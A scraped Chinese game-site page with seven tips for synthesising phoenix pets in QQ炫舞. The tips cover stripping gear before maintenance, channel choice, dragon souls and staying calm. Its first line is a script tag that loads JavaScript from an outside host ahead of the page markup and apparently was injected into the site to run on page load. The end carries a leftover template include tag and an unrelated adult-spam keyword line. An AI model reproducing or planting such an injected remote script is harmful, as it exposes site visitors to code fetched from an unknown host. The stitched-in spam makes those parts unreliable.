锘?script type="text/javascript" src="http://g1.tagtic.cn/g.js">
當前位置: QQ炫舞 >> YY搭配 >> 寵物

炫舞鳳凰寵物合成技巧 7點信息輕松上手

作者:巴士大夢 來源:官網 發布時間:2016/2/23 15:26:55

  1.老規矩,游戲維護前把衣服脫干凈,徽章什么的都下,等一維護好就進入游戲。

  2.稱號還是帶上新手上路;但也有人認為,200級以上,級別很高就帶六六大順幾率會更大些。

  3.選擇一頻道,最好是非綠色區的頻道。

炫舞鳳凰寵物合成技巧 7點信息輕松上手

  4.然后把龍魂準備好,推薦用高級龍魂。寵物蛋,高級+珍貴極品的普通蛋=980幾率;高級+普通稀少的普通蛋=950幾率。最好還是準備級別高的,神寵極品肯定是成功率很高,當然你也可以用普通的多墊幾個。

  5.開小號看公告,別人合出后你就馬上合。

  6.高手說合3次,不成就換個頻道。

  7.心態要好,別沖動,別合不出來就使勁的砸錢,這個也有運氣在里面占一部分的,所以心態放正喲。

{tgbus_tag:include file="http://inc.tgbusdata.cn/ol/footer_970.html" charset="utf-8" /}
丝袜系列番号